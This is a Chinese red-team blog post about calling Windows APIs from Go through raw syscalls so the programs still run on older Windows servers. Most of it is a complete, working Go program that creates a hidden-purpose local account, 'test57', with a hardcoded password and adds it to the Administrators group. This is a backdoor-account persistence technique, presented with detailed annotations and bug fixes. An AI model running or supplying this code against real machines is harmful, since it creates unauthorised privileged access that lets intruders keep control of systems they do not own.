首发于知识星球
需要注意的是 Go 版本问题：实战中 Windows Server 2008 仍然很常见，而用高版本 Go 编译出的程序不一定能在这些旧系统上运行。按作者的测试，最后一个能让本文这类 syscall 调用在低版本 Windows 上正常运行的编译器是 Go 1.10.8。
不过，用高版本 Go 编译的 frp 却可以在 2008 上运行，说明这一限制可能与具体使用的 API 有关；建议先在目标系统版本上实际测试再投入使用。
这里用的学习资料是lengyil师傅的文章(RedTeam Tips-PEB隐藏)
https://mp.weixin.qq.com/s/UM-RlHX6mTo-lfANHbs7sQ
具体的调用顺序为：LoadLibrary -> GetProcAddress -> Syscall6（下面 demo 里两个 API 的参数都不超过 6 个，所以用 Syscall6；参数更多时换用 Syscall9 等变体）。
最后是一个添加用户的 demo：通过 Netapi32 的 NetUserAdd 创建本地用户，再用 NetLocalGroupAddMembers 把它加入 Administrators 组（两步都需要管理员权限）。
//author:YanMu
package main
import (
	"runtime"
	"syscall"
	"unsafe"
)
// DWORD mirrors the Win32 DWORD: an unsigned 32-bit integer.
type DWORD uint32

// LPWSTR stands in for a Win32 LPWSTR (pointer to a NUL-terminated UTF-16
// string). It is declared as uintptr rather than *uint16 so the structs below
// can be laid out like their C counterparts; note that a uintptr does NOT keep
// the pointed-to Go memory alive for the garbage collector.
type LPWSTR uintptr
// USER_PRIV_USER is the lmaccess.h privilege level for an ordinary user; it is
// the value stored in usri1_priv below.
const USER_PRIV_USER = 1

// UF_SCRIPT is the lmaccess.h "logon script executed" account flag; it is the
// value stored in usri1_flags below.
const UF_SCRIPT = 0x0001

// NERR_Success is the NET_API_STATUS value returned by a successful Netapi32 call.
const NERR_Success = 0
// USER_INFO_1 mirrors the Win32 USER_INFO_1 structure (lmaccess.h) that
// NetUserAdd consumes at level 1. Field order and types define the memory
// layout handed to the API, so they must not be reordered.
type USER_INFO_1 struct {
	usri1_name LPWSTR // account name (UTF-16, NUL-terminated)
	// Named usri1_password in the Windows SDK; the layout is unaffected.
	usri_password      LPWSTR
	usri1_password_age DWORD // ignored by NetUserAdd
	usri1_priv         DWORD // set to USER_PRIV_USER below
	usri1_home_dir     LPWSTR
	usri1_comment      LPWSTR
	usri1_flags        DWORD // set to UF_SCRIPT below
	usri1_script_path  LPWSTR
}
// _LOCALGROUP_USERS_INFO_0 is a single-LPWSTR buffer passed to
// NetLocalGroupAddMembers at level 3. The documented buffer type for level 3 is
// LOCALGROUP_MEMBERS_INFO_3 (one LPWSTR holding "domain\name"); this struct has
// the same one-pointer layout, which is why the call works despite the name.
type _LOCALGROUP_USERS_INFO_0 struct {
	lgrui0_name LPWSTR
}
// Netapi32 is the module handle for Netapi32.dll, loaded at package init.
// The LoadLibrary error is discarded: on failure the handle is 0 and the two
// procedure addresses below resolve to 0 as well.
var Netapi32, _ = syscall.LoadLibrary("Netapi32.dll")

// NetUserAdd is the raw address of Netapi32!NetUserAdd, called through
// syscall.Syscall6. A failed lookup leaves it 0 (error discarded).
var NetUserAdd, _ = syscall.GetProcAddress(Netapi32, "NetUserAdd")

// NetLocalGroupAddMembers is the raw address of Netapi32!NetLocalGroupAddMembers.
// A failed lookup leaves it 0 (error discarded).
var NetLocalGroupAddMembers, _ = syscall.GetProcAddress(Netapi32, "NetLocalGroupAddMembers")

// dwError is the parm_err slot for NetUserAdd (zero value = 0).
var dwError DWORD

// user is the USER_INFO_1 buffer filled in before NetUserAdd.
var user USER_INFO_1

// account is the single-member buffer passed to NetLocalGroupAddMembers.
var account _LOCALGROUP_USERS_INFO_0
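// add_user_To_the_admin_group creates the local user "test57" (password
// "P@sss!111") with NetUserAdd and then adds it to the local "Administrators"
// group with NetLocalGroupAddMembers. Outcomes are reported with println; the
// function returns nothing, so callers cannot tell success from failure.
//
// NOTE(review): both Net API calls require an elevated administrator token;
// under UAC an unelevated process gets ERROR_ACCESS_DENIED (5) even when the
// current user is an administrator. The group is addressed by name, which is
// locale dependent (e.g. "Administratoren" on German Windows); resolving the
// well-known SID S-1-5-32-544 via LookupAccountSidW would be robust, but is
// not done here.
func add_user_To_the_admin_group() {
	// The module handle is package-level and is released when this function
	// returns, so a second call would use a freed module. The demo calls it once.
	defer syscall.FreeLibrary(Netapi32)

	// GetProcAddress errors are discarded at package scope; a zero address
	// would make Syscall6 jump to NULL, so refuse to call through it.
	if NetUserAdd == 0 || NetLocalGroupAddMembers == 0 {
		println("Netapi32 导出函数解析失败")
		return
	}

	// Keep the *uint16 buffers in Go-visible variables: LPWSTR is a uintptr,
	// which does not keep the UTF-16 memory alive for the GC. runtime.KeepAlive
	// at the end guarantees they survive until after the last system call.
	name := syscall.StringToUTF16Ptr("test57")
	pass := syscall.StringToUTF16Ptr("P@sss!111")
	group := syscall.StringToUTF16Ptr("Administrators")

	user.usri1_name = LPWSTR(unsafe.Pointer(name))
	user.usri_password = LPWSTR(unsafe.Pointer(pass))
	user.usri1_priv = USER_PRIV_USER
	user.usri1_flags = UF_SCRIPT

	// NetUserAdd(servername=NULL -> local machine, level=1, buf, parm_err).
	// parm_err receives the index of the first bad USER_INFO_1 member on
	// ERROR_INVALID_PARAMETER; the original passed the value 0 (i.e. NULL)
	// instead of &dwError, so that index was never reported.
	status, _, _ := syscall.Syscall6(NetUserAdd, 4,
		0, 1, uintptr(unsafe.Pointer(&user)), uintptr(unsafe.Pointer(&dwError)), 0, 0)
	if status == NERR_Success {
		println("添加用户成功!")
	} else {
		// status is a NET_API_STATUS, not GetLastError: e.g. 5 = ERROR_ACCESS_DENIED,
		// 2224 = NERR_UserExists, 2245 = NERR_PasswordTooShort (password policy).
		println("添加用户失败", "status:", status, "parm_err:", dwError)
	}

	// Deliberately continue after a failed create: the account may already
	// exist, in which case adding it to the group is still the intended result.
	account.lgrui0_name = user.usri1_name
	adminGroup := LPWSTR(unsafe.Pointer(group))

	// NetLocalGroupAddMembers(servername=NULL, groupname, level=3, buf, totalentries=1).
	// Level 3 takes LOCALGROUP_MEMBERS_INFO_3 (a single LPWSTR "domain\name");
	// _LOCALGROUP_USERS_INFO_0 has the same one-pointer layout.
	status, _, _ = syscall.Syscall6(NetLocalGroupAddMembers, 5,
		0, uintptr(adminGroup), 3, uintptr(unsafe.Pointer(&account)), 1, 0)
	if status == NERR_Success {
		println("添加用户到管理员组成功!")
	} else {
		// e.g. 1378 = ERROR_MEMBER_IN_ALIAS (already a member),
		// 1387 = ERROR_NO_SUCH_MEMBER, 2220 = NERR_GroupNotFound.
		println("添加用户到管理员组失败", "status:", status)
	}

	// Pin the UTF-16 buffers until after the last call that reads them.
	runtime.KeepAlive(name)
	runtime.KeepAlive(pass)
	runtime.KeepAlive(group)
}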
// main is the demo entry point: it runs the single add-user-and-elevate step
// and exits. Exit status is always 0; failures are only printed.
func main() {
	run := add_user_To_the_admin_group
	run()
}